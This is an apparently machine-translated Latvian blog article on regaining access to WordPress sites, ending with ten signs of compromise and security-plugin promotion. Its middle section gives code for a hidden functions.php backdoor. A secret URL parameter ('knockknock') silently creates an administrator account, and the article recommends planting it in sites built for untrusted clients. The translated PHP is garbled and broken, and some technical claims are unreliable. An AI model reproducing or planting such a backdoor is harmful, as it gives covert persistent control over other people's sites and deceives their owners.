Kā ielauzties WordPress vietnē, pilnīga rokasgrāmata

Kā iekļūt WordPress vietnē, pilnīgs ceļvedis


Mēs neatsakāmies, neapstiprinām un neveicinām nelikumīgu vai ļaunprātīgu rīcību! Šī raksta mērķis ir izskaidrot, kā uzlauzt vai atgūt piekļuvi WordPress vietnei, kas jums pieder, vai arī jums ir tiesības rediģēt, administrēt un piekļūt. Lai ko jūs darītu, jūs to darāt pats. Mēs neesam atbildīgi par jūsu darbībām. Šī rokasgrāmata paredzēta tikai izglītības vajadzībām.

Aprakstītās metodes palīdzēs jums atgūt piekļuvi vietnei pat tad, ja jums vairs nav konta, taču būs nepieciešama zināma informācija par šo vietni, un tās nepalīdzēs jums iekļūt nevienā nejaušā WordPress instalācijā.

Šajā ceļvedī mēs jums parādīsim:

  • Kā iekļūt WordPress vietnē
  • Kā WordPress izveidot aizmugures durvis
  • Kā izveidot jaunu lietotāja kontu, izmantojot FTP
  • 10 pazīmes, ka jūsu WordPress vietne ir uzlauzta

Kā iekļūt WordPress vietnē, pilnīgs ceļvedis

Situācijas, kurās varat sev palīdzēt

Ja atrodaties kādā no šīm situācijām, mūsu metodes palīdzēs jums atgūt piekļuvi:

  • aizmirsāt lietotājvārdu vai e-pasta adresi
  • paroles atiestatīšanas opcija nedarbojas mitināšanas serverī
  • paroles atiestatīšanas e-pasta ziņojumi netiek saņemti
  • jums vairs nav piekļuves konta e-pasta adresei
  • jūs zināt lietotājvārdu un paroli, bet kombinācija vienkārši nedarbojas

Lai izmantotu turpmāk aprakstītās metodes, jums būs nepieciešams tikai viens no šiem:

  • FTP piekļuve serverim vai
  • cPanel piekļuve serverim vai
  • piekļuvi MySQL datu bāzei un iespēju pieslēgties tai attālināti

1. metode – MySQL veids

Izmantojiet šo metodi, lai mainītu esoša lietotāja paroli (vai lietotājvārdu, ja nepieciešams) vai izveidotu jaunu kontu. Jums būs nepieciešama cPanel piekļuve vai tieša MySQL piekļuve vietnes datu bāzei. Sāksim, mainot esoša lietotāja paroli.

Ja izmantojat cPanel, piesakieties (cPanel vienmēr var piekļūt, izmantojot https://yoursite.com:2083 saite), atrodiet un atveriet phpMyAdmin. Kreisajā pusē ir datu bāzu un tabulu saraksts. Jūs meklējat galdu, kura beidzas ar _lietotāji. Droši vien būs wp_lietotāji, bet, ja serverī ir instalēta vairāk nekā viena WordPress vietne, jums jāatrod pareizā.

Labajā tabulā būs lietotājs, kuru vēlaties rediģēt. Veiciet to pašu procedūru, ja veidojat savienojumu ar MySQL, izmantojot kādu ārēju klientu, piemēram SQLyog. Kad esat atradis tabulu un faktisko lietotāja ierakstu, ir laiks mainīt paroli.

Kā jūs, iespējams, jau esat sapratuši, parole tiek saglabāta mapē lietotāja_pass lauks, sajaukts, izmantojot MD5 algoritmu. Atveriet tiešsaistes MD5 ģenerators ievadiet paroli, kuru vēlaties izmantot, un noklikšķiniet uz “Hash”. Nokopējiet ģenerēto virkni un nomainiet sākotnējo paroli ar to. Vietnē phpMyAdmin varat rediģēt lauku, veicot dubultklikšķi uz tā. Procedūra ir līdzīga citiem MySQL klientiem. Saglabājiet izmaiņas un piesakieties WordPress ar jauno paroli.

WP lietotāju tabula

Lietotājvārdi, sajauktas paroles un e-pasti tiek glabāti wp_lietotāji datu bāzes tabula

Joprojām tiek izmantota 1. metode – jauna lietotāja izveidošana

Jauna lietotāja izveide ir nedaudz sarežģītāka, taču joprojām pārvaldāma mazāk nekā minūtes laikā. Izveidojiet jaunu ierakstu lietotāju tabulā un apdzīvotās vietas: user_login, user_pass (sajaukts, izmantojot iepriekš aprakstīto MD5 funkciju) un user_email. Visi pārējie lauki var palikt tukši; viņiem nav nozīmes Saglabājiet jauno ierakstu. Pēc saglabāšanas MySQL piešķirs tai unikālu ID. Tas ir numurs ID laukā. Atceries to.

Tagad dodieties uz _usermeta tabula. Atcerieties, tabulas prefiksam jābūt tādam pašam kā lietotāja prefiksam. Piemēram wp_lietotāji un wp_usersmeta. Ja prefikss nav tas pats, jūs rediģējat nepareizu tabulu (par kādu citu WP instalāciju), un jaunais konts nedarbosies. Mēs izveidosim divus jaunus ierakstus. Ignorēt umeta_id lauks abiem. Komplekts Lietotāja ID laukā līdz vērtībai, kuru tikko atcerējāties (jaunā ID vērtība lietotāju tabulā). Pirmajam ierakstu komplektam meta_key uz wpct_user_level un meta_vērtība uz 10. Par otro meta_key uz wpct_cabables un meta_vērtība uz a: 1: {s: 13: "administrators"; b: 1;}. Saglabājiet abus. Jūs esat pabeidzis – piesakieties!

2. metode – function.php veids

Šo pieeju var izmantot, rediģējot function.php caur cPanel vai izmantojot FTP klientu. Ja izmantojat cPanel, atrodiet failu pārvaldnieku un atveriet to. Pirmkārt, mums jāatrod aktīvās motīva mape.

Iet uz public_html / wp_content / themes mape. Ja jūs uzreiz redzat savu tēmu un zināt, kura tā ir – lieliski. Atveriet tā mapi un sāciet rediģēšanu funkcijas.php. Ja nē, atveriet vietni, ar peles labo pogu noklikšķiniet jebkur, atlasiet “Skatīt avotu”. Pēc tam nospiediet Ctrl + F un sāciet rakstīt / tēmas / drīz jums būs izcelts daudz URL, un jūs atpazīsit aktīvās motīva mapes nosaukumu.

Atrodiet to faila struktūrā, atveriet un sāciet rediģēt funkcijas.php. Kopējiet / ielīmējiet šo kodu faila beigās. Ņemiet vērā noslēgumu ?> PHP tagi, ja tie jums ir. Viņiem jāatrodas pēdējā rindā. Tāpēc ievietojiet kodu pirms tiem.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! lietotājvārds_eksistē ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (masīvs ('ID' => $ user_id, 'segvārds' => $ new_user_email));

$ user = new WP_User ($ user_id);
$ user-> set_role ('administrators');
}

Rediģējiet tikai pirmās divas koda rindiņas, lai atspoguļotu jauno kontu. Ja WP jau ir kāds lietotājs ar šo e-pastu, jauns konts netiks izveidots, tāpēc pārliecinieties, vai tas ir jauns. Nomainiet arī paroli – nekļūstiet par uzlauztu skriptu kiddies. Pēc faila saglabāšanas vienkārši atveriet savu vietni, kods tiks palaists, izveidots jauns konts ar administratora tiesībām un jūs varēsit tajā pieteikties..

Pēc tam atcerieties izdzēst kodu no funkcijas.php.

Citas uzlaušanas metodes

Zinot FTP, cPanel vai MySQL paroli, jūs pierādāt, ka jums ir likumīgas piekļuves tiesības serverim un tāpēc jums vajadzētu būt piekļuvei arī WordPress instalācijai (-ām). Ja jums nav neviena no šiem kontiem, tad jums nekas nav kārtībā (uzlauzšana citu cilvēku vietnēs), un tas nav jauki!

Lūdzu, atcerieties, ka nesankcionētas piekļuves iegūšana visiem datoriem, vietnēm vai serveriem ir smags noziegums, un lielākajā daļā valstu tas tiek nekavējoties risināts..

Ja jums ir bail, ka jūsu WordPress vietne var tikt uzlauzta, lūdzu, pārbaudiet šo lapu ar bezmaksas WordPress drošības skeneri. Ja jums nav laika izveidot savu emuāru, ļaujiet mums to izdarīt jūsu vietā.

Kā WordPress izveidot aizmugures durvis

Kad ārdurvis ir aizvērtas, jūs varētu izmēģināt aizmugurējās durvis. Tas varētu izklausīties kā ļaunprātīgs veids, kā izmantot kodu, lai ieietu vietnē bez piekļuves tai, taču patiesībā ir reizes, kad jums ir jākontrolē sava vietne, ja kāds to nozaga..

Ja tas rada tīmekļa vietnes citiem cilvēkiem kaut ko tādu, ko jūs darāt, agrāk vai vēlāk būs kāds klients, kurš atteiksies maksāt jums par jūsu darbu; klients, kurš izdzēsīs jūsu pieteikšanās informāciju un pārņems kontroli pār visu, ko esat izdarījis. Dažreiz pietiks ar jauna lietotāja izveidi, izmantojot FTP, vai paroles atiestatīšanu. Kad ar to nepietiek, jūs varētu vēlēties ienākt atpakaļ vai izveidot piekļuvi aizmugures durvīm savām administratora lapām.

Bet, ja jūs nolemjat paslēpt nelielu koda daļu savā WordPress vidē, jūs, iespējams, ietaupīsit sev zināmu cieņu un piekļūt WordPress vietnei ar administratora privilēģijām. Un tieši tur sākas spēles.

Neatkarīgi no tā, cik reizes šis zaglis izdzēš jūsu informāciju vai atjauno rezerves kopiju serverī, kas viņam, iespējams, pieder, pastāv iespēja, ka viņš neko nezina par ieejām aizmugurējos durvīs. Ja viņš to darītu, iespējams, ka viņam pat nebūtu vajadzīga jūsu palīdzība WordPress iestatīšanā?

Izveidojiet aizmugures durvis:

Labi, pietiek ar sarunu; šeit ir koda kods, kas jums būs nepieciešams, lai paveiktu darbu:

  1. Atveriet function.php failu
  2. Kopēt / ielīmēt šo kodu:
  3. add_action ('wp_head', 'wploop_backdoor');
    funkcija wploop_backdoor () {
    Ja ($ _GET ['backdoor'] == 'knockknock') {
    pieprasīt ('wp-iekļauj / reģistrācijas.php');
    Ja (! Lietotājvārds_eksistē ('lietotājvārds')) {
    $ user_id = wp_create_user ('nosaukums', 'caurlaide');
    $ user = new WP_User ($ user_id);
    $ user-> set_role ('administrators');
    }
    }
    }
    ?>
  4. Saglabāt izmaiņas

Ja atstājat kodu tādu, kāds tas ir, viss, kas jums jādara, lai vietnē izveidotu jaunu administratoru, ir apmeklējums http://www.yourdomain.com/?backdoor=knockknock

Pēc lapas ielādēšanas jūsu jaunais lietotājvārds ir “Vārds” un paroli “Nokārtot”.

Protams, to var mainīt kodā iepriekš, mainot vārdus un vārdus uz ko vien vēlaties. Varat arī mainīt saiti uz jūsu aizmugurējām durvīm, mainot “backdoor” un / vai “knockknock” uz jebko, kas jums rodas.

Izmēģiniet funkciju – tas ir ne tikai jautri, bet arī var palīdzēt jums kādreiz nākotnē, kad jūs gatavojaties izveidot vietni kādam, kam jūs nevarat pilnībā uzticēties. Jums vajadzētu arī pielīdzināt savas WordPress un emuāru veidošanas prasmes.

Kā izveidot jaunu lietotāja kontu, izmantojot FTP

Jaunu lietotāju kontu izveide WordPress ir ļoti vienkārša. Kā administratoram jums tas jādara dodieties uz Lietotāju administratora lapu kur varat izveidot jaunu kontu jebkurai lietotāja lomai. To var izdarīt dažu sekunžu laikā, un jaunizveidotais lietotājs var nekavējoties pieteikties, izmantojot norādīto lietotājvārdu un paroli.

Bet kas notiek, ja jūs zaudējat piekļuvi savam WordPress administratoram? Lietas varētu kļūt nedaudz sarežģītākas, taču neuztraucieties – mums ir funkcija, kas var ietaupīt jūsu administratora dzīvi.

Neatkarīgi no tā, vai cits administrators izdzēsa jūsu kontu, vai esat kļūdas dēļ izdzēsis visus lietotājus no datu bāzes, izmantojis nepareizi funkcionējošu spraudni vai uzlauzts, jūs joprojām varat atgūt kontroli. Dažreiz jūs, iespējams, varēsit piekļūt tikai savam FTP serverim, kamēr HTTP serveris nebūs pieejams, un jums būs jāizveido jauns administrators. Lai gan tas varētu būt rets gadījums, šī funkcija jūs ietaupīs.

Lai izveidotu jaunu kontu ārpus WordPress administratora vides, viss, kas jums būs nepieciešams, ir FTP piekļuve jūsu vietnei. Kā administratoram jums vajadzētu būt visai nepieciešamajai informācijai, lai pieteiktos serverī, un jūs varat ātri izveidot jaunu kontu, motīvā izveidojot jaunu funkciju.

Izmantojot FTP, izveidojiet jaunu lietotāja kontu:

  1. Atveriet FTP klientu un izveidojiet savienojumu ar savu kontu
  2. Dodieties uz wp-saturu / tēmām
  3. Atveriet izmantotā motīva mapi
  4. Meklējiet failu function.php un rediģējiet to
  5. Kopējiet un ielīmējiet šo funkciju:
  6. funkcija admin_account () {
    $ user = 'Lietotājvārds';
    $ pass = 'Parole';
    $ e-pasts = '[email protected]ēns.com';
    if (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = new WP_User ($ user_id);
    $ user-> set_role ('administrators');
    }}
    add_action ('init', 'admin_account');
    
  7. Mainiet lietotājvārdu, paroli un e-pastu uz kaut ko unikālu
  8. Saglabāt izmaiņas

Pārliecinieties, vai funkcijā iestatītais lietotājvārds, parole un e-pasta adrese ir unikāli pretējā gadījumā funkcija nedarbosies pareizi. Kad izmaiņas ir saglabātas, esat pabeidzis un varat pāriet uz savu WP pieteikšanās paneli. Izmantojiet jaunu informāciju, lai atkal pieteiktos, un pēc konta verifikācijas jūs varat izdzēst funkciju no faila function.php.

Iepriekš parādītā funkcija izveido administratora kontu, bet jūs to varat viegli modificēt, lai izveidotu kontu ar jebkuru citu lietotāja lomu. Vienkārši mainīt lomu 8th rinda koda redaktors, autors, līdzautors, abonents vai jebkura cita jūsu izveidota lietotāja loma.

Diemžēl, ja esat pazaudējis savu administratora kontu, esat pazaudējis arī visas ziņas, kas rakstītas zem šī lietotājvārda. Tāpēc jums vienmēr ir jāglabā rezerves kopija, kuru varat viegli iegūt. Ja jūs to lasāt, kamēr jums ir administratora konts, ņemiet to kā atgādinājumu, lai nekavējoties izveidotu dublējumu un pievienojiet grāmatzīmi šim rakstam tikai gadījumā, ja nākotnē jums būs jāizveido konts ārpus WordPress.

10 pazīmes, ka jūsu WordPress vietne ir uzlauzta

WordPress ir milzīga emuāru veidošanas platforma. Lietotāju ir miljoniem, un šķiet, ka skaits katru dienu strauji pieaug. Cilvēki pat mēdz pārsūtīt savas tīmekļa vietnes, kas izveidotas citās satura pārvaldības sistēmās, uz šo atvērtā koda sistēmu biežāk, nekā jūs varētu domāt. Un, lai gan tas ir labi, tas nozīmē Hakeri arī ievietos WordPress numur viens, mēģinot iebrukt nejaušās vietnēs.

Parasti, ja jums uzlauzts, jūs par to uzzināsit uzreiz. Jūsu vietne kļūs nepieejama; jūs nevarēsit pieteikties, un dažreiz hakeris pat atstās ziņojumu pirmajā lapā. Bet biežāk nekā nē, jūs, iespējams, pat nepamanīsit, ka kaut kas ir mainījies. Šajā raksta daļā mēs drīz parādīsim jums vairākas pazīmes, kas varētu liecināt, ka jūsu WordPress vietnē ir uzlauzts, un dažus problēmas risinājumus..

1. Neveiksmīga pieteikšanās

Šī zīme ir diezgan acīmredzama. Ja esat kādu laiku izmantojis lietotājvārdu un paroles kombināciju, nekad neradot problēmas, jums var rasties aizdomas, ja pēkšņi WordPress neatpazīst jūsu kontu. Ja hakerim vajadzēja pieteikties jūsu vietnē, iespējams, ka viņš ātri mainīs jūsu administratora privilēģijas.

Varbūt viņam nācās mainīt jūsu paroli vai pilnībā izdzēst jūsu kontu. Pirms sākat paniku pēc pirmās reizes, kad WordPress ziņo jums par nepareizu lietotājvārdu / paroli, lūdzu, ņemiet vērā faktu, ka, iespējams, esat ievadījis nepareizu kombināciju vai ieslēdzis burtu bloķēšanas pogu.

Risinājums: Mēģiniet atgūt paroli pa e-pastu vai izmantojiet citu kontu, lai atkal pieteiktos. Lai pārliecinātos, ka pieteikšanās ir droša, ieteicams instalēt Pieteikšanās Ninja spraudnis WordPress.

2. Jūsu vietnei tiek pievienots ļaunprātīgs saturs

Vietne satur brīdinājumu par ļaunprātīgu programmatūru

Ja savā vietnē sākat pamanīt nepazīstamu saturu, jūs varat sākt uztraukties. Kad viņi saņems iespēju piekļūt jūsu administratora zonai, hakeri varēs mainīt gan jūsu kodolu, gan motīvu, gan spraudņu failus. Tas nozīmē, ka viņi var mainīt jebko, ko vēlas.

Lai gan daži hakeri krasi mainīs jūsu vietnes izskatu un varbūt pat izskaidros, ka esat uzlauzts, citi būs par to daudz smalkāki..

Risinājums: Mēģiniet meklēt slēptu saturu vietnes kodā. Iespējams, ka ir saites uz ļaunprātīgu vietņu hakeriem, kas ievietoti jūsu vietnes kājenē, vai arī viņi ir instalējuši uznirstošos logus, kas regulāri tiks atvērti jūsu klientiem. Izmantojiet drošības ninja, lai skenētu savu vietni vai nepārtraukti uzraudzītu jūsu vietni šādām problēmām.

3. Aizdomīgi apmeklējumi

Ja jūs neizsekojat savu vietni, jums tas jāsāk nekavējoties. Vienkāršs veids, kā to izdarīt, ir Google Analytics izmantošana, kas, starp daudzām citām funkcijām, var pateikt, cik apmeklējumu jūs saņemat un no kurienes tie nāk. Pēc kāda laika jūs iepazīsities ar savu vietni. Tas nozīmē, ka jūs zināt, no kurienes nāk apmeklējumi, jūs zināt, kad sākat jaunu kampaņu un kad savvaļā tiek izlaistas jaunas reklāmas saites.

Bet, ja pēkšņi pamanāt, ka jūsu vietne saņem milzīgu skaitu jaunu apmeklējumu no aizdomīgā domēna, jūs vēlēsities to izpētīt sīkāk, jo jūsu vietne var vienkārši tikt uzlauzta. Parasti šāda veida apmeklējumi nodrošina 100% atlēcienu līmeni, kas nozīmē, ka tika apmeklēta tikai viena lapa. Hakeri bieži izmantos automatizētas sistēmas, kas citas sliktas vietnes novedīs pie jūsu vietnes. Neatkarīgi no tā, vai jūsu vietnē tiek izpildīts sliktais kods, vai arī jūs esat kļuvis par surogātpasta izplatīšanas tīkla sastāvdaļu, viss var kļūt nopietni, un jums būs jāpārbauda, ​​vai jūsu vietnē nav ļaunprātīga koda.

Risinājums: Izmantojiet Google tīmekļa pārziņu rīki lai atrastu aizdomīgus domēnus

4. Pēkšņs satiksmes kritums

Droša vietņu statusa pārlūkošana

Atšķirībā no pēdējās pieminētās uzlaušanas pazīmes, iespējams, tas jūs brīdinās, jo pēkšņi samazinās apmeklējumu skaits. Tā vietā, lai atsauktos uz jums jauniem apmeklējumiem, hakeris var sūtīt apmeklējumus ārpus jūsu vietnes. Tas varētu notikt tāpēc, ka hakeris novirzīja jūsu vietni uz citu. Cits iemesls mazāk apmeklētāju ir tas, ka Google jūsu vietni iekļāva melnajā sarakstā. Šī darbība parādīs ziņojumu visiem lietotājiem, kuri var izvēlēties neatvērt jūsu vietni, jo tā ir inficēta.

Risinājums: Izmantojiet Google Drošas vietnes pārlūkošanas statuss lai pārbaudītu, vai jūsu vietne ir atzīmēta kā nedroša un vai to pašlaik ir bīstami apmeklēt.

5. Meklētājprogrammu rezultāti ir dīvaini

Ja savā vietnē neesat pamanījis nekādas izmaiņas, bet tomēr uzzinājāt, ka meklēšanas rezultāti Google un citās meklētājprogrammās ir savādi (rāda dažādus nosaukumus un citus metadatus), tā, iespējams, ir skaidra uzlauztas vietnes pazīme. Hakeris, iespējams, mainīja jūsu saturu tādā veidā, ka tas ir redzams tikai ekspertam. Tomēr izmaiņas būs redzamas meklētājprogrammu rezultātos.

Risinājums: Pārbaudiet savu vietni ar Google tīmekļa pārziņu rīki, un pārbaudiet, vai jūsu vietne nav tikusi uzlauzta bezmaksas tiešsaistes rīks.

6. Jūs nevarat nosūtīt / saņemt e-pastus

Tiklīdz hakeris piekļūs jūsu vietnei, viņš, iespējams, vēlēsies Izmantojiet savu serveri, lai surogātpastu pārējiem. Uzzinot, ka nevarat nosūtīt vai saņemt jaunus e-pastus no savas WordPress, tā var būt skaidra zīme, ka esat uzlauzts. Vēlreiz pārbaudiet savu e-pastu un pēc tam sazinieties ar pakalpojumu sniedzēju, lai pārliecinātos, ka tajā nav kļūdu.

Risinājums: Pārbaudiet savu WordPress pasta funkcija ar šo bezmaksas spraudni.

7. Vietne neeksistē

Serveris nav atrasts

Dažreiz hakeri nevarēs piekļūt jūsu vietnei, lai iestādītu ļaunprātīgu kodu, novirzītu lietotājus vai izmantotu jūsu e-pastu surogātpastam. Dažreiz, viņi vēlēsies tikai sabojāt jūsu vietni. Reti kurš hakeris veiksmīgi izdzēsīs visu no visa servera. Tāpēc ir svarīgi mitināt savus failus pazīstamā mitināšanas uzņēmumā, kas rūpējas par drošību un katru dienu vai vismaz reizi nedēļā nodrošina jūsu vietnes dublējumus. Tā ir laba prakse, ka laiku pa laikam darāt arī pats savus dublējumus, lai vietni varētu ātri atjaunot.

Risinājums: Instalējiet vienu no labākajiem spraudņiem dublējuma pārvaldībai programmā WordPress.

8. Aizdomīgi faili

Līdzīgi kā ar ļaunprātīgu saturu, ko var pievienot esošajiem failiem, hakeris var iestādīt papildu failus jebkur jūsu saknes mapē. Ir labi zināt savu ceļu uz WordPress, taču, ja neesat tik pieredzējis, jums vajadzētu būt pieejamam drošības rīkam, kas var pārbaudīt visus jūsu failus un darbības. Nesen mēs pārskatījām drošības ninju, kas ir ideāls rīks visu jūsu WordPress failu pārbaudei.

Risinājums: Mēģiniet meklēt failus, kas nepieder jūsu WordPress instalācijai. Izmantojiet Security Ninja, lai regulāri skenētu vietni un automātiski atrastu šos failus. Pēc tam izdzēsiet failus vai noņemiet ļaunprātīgo kodu no inficētajiem failiem. Neaizmirstiet par drošības ninja papildinājumu Core Scanner.

9. Jauni biedri

Atkarībā no jūsu vietnes, iespējams, jūs vienīgais varēsit pievienot jaunus dalībniekus. Tādā gadījumā e-pasts, kas stāsta jums par jaunreģistrētiem lietotājiem, var izraisīt trauksmi. Ja ir arī citi administratori, kuriem ir iespēja pievienot jaunus dalībniekus, sazinieties ar viņiem par aizdomīgām darbībām.

Risinājums: Mainiet pieteikšanās URL ar bezmaksas spraudni, ierobežojiet piekļuvi savai WordPress pieteikšanās lapai, izmantojot .htpasswd failu, un izmantojiet Login Ninja, lai visu laiku aizsargātu savu pieteikšanās formu.

10. Pārbaudiet plānotos pasākumus uz jūsu servera

Dažreiz hakeris nedarīs kaut ko jūsu vietnei, kad atradīs ceļu. Tā vietā, viņi atstās plānotos pasākumus kas nākotnē varētu kaitēt jūsu vietnei. Šis paņēmiens ir bīstams, jo hakeris sākumā nepieredzējušu upuri var atstāt bezjēdzīgu. Iespējams, ka esat inficējies un neko par to nezināt.

Risinājums: Pārbaudiet CRON darbus uz jūsu izmantotā servera un pārliecinieties, vai nav aizdomīgu ieplānoto uzdevumu.

Iesaiņošana

Mēs ceram, ka šis raksts palīdzēs jums pārvaldīt pat drošāku WordPress vietni un ka tas palīdzēs atgūt piekļuvi tai sliktās situācijās. Un pat ja jūsu vietne ir tīra, lūdzu, neuzņemieties to par pašsaprotamu.
Vienmēr pārliecinieties, ka jūsu emuārs ir maksimāli drošs. Mēs iesakām WordPress drošības spraudņus, kas var ietaupīt visvairāk reizes. Tomēr nelietojiet to, kas izmanto nedrošu paroli, un esiet piesardzīgs, uzlaužoties savā WordPress vietnē.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map